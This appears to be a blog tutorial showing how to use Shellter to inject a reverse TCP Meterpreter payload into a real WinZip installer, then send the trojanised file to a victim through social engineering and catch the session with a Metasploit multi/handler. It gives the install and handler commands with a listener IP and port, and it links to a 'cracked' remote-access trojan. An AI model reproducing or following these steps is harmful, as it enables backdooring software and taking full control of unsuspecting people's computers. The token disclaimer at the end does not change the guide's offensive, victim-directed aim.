Shellter

How to Inject Malicious Code Inside Exe Files using Shellter

Shellter is a dynamic shellcode injection tool used to inject payloads into a Windows executable (EXE) file.

This injection allows you to disguise a payload or malicious code into a real executable file. In order to demonstrate this technique, I am going to inject a reverse TCP meterpreter payload into an EXE.

This harmless file can be any EXE, like the CCleaner.exe or the WinZip.exe file. As you can imagine, if you find a method to deliver this malicious file to a person then it is possible to compromise the persons’ system without much difficulty.

Install Shellter

You can install Shellter by using the following command:apt install shellter

In order to demonstrate and use the tool, you will need to get some type of installer to test against. For this example I have chosen to use the WinZip.exe application installer.

Run Shellter

Shellter can be run with the following terminal command:shellter

Inject Payload into EXE

Now that I have everything ready, I can inject a payload into the WinZip installer.

1*6JMo0GH9jsQtsyrwokl0OQ

The tool will allow the choice between Auto or Manual operation mode. I will proceed with the Auto method.

Also Read : Unlocking the Secrets of Botnet Creation with Koadic

1*03GSLx8QN7 Db FjLZZa4A

Shellter will then ask for the PE Target or the path to the executable. In my case in I will point the tool towards the executable I have downloaded (winzip23-downwz.exe).

Then, you are prompted to enable stealth mode. Type ‘Y’ for yes.

1*KZjmvOjmGN33GwLISlkeHQ

Then, it asks you to select payload. In my case, I have selected 1 for Meterpreter_Reverse_TCP.

1*AzV8FaKOjSc2qDTpQ9EfEg

Then you are asked to set LHOST and LPORT. Type the local host IP and the local port. You can use ifconfig command to find your IP address.

1*mjgtAQv6rTs61ZTayNsAOg

Finally after entering the address and port, the application proceeds to infect the installer.

Also Read : VenomRAT v6.0 Cracked | FREE Download | 2023

Send WinZip.exe File to Victim’s Machine

At this point, all you have to do is to use your social engineering skills and send the ‘winzip23-downwz.exe’ file to the victim. So, let’s set the listener to capture a session when the victim runs the file.

In a new terminal type msfconsole to launch Metasploit framework and execute the following commands:msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.0.17
msf5> set LPORT 8080
msf5> run

As soon as the victim clicks on the ‘winzip23-downwz.exe’ file, I will get a meterpreter session as shown in the below image.

1* N7DrOiVuCVdL4DMwGUBPg

From here, you have complete control over the target machine.

Note: Please know that all the information is used to expand knowledge and not for causing malicious or damaging attacks.

Leave a Reply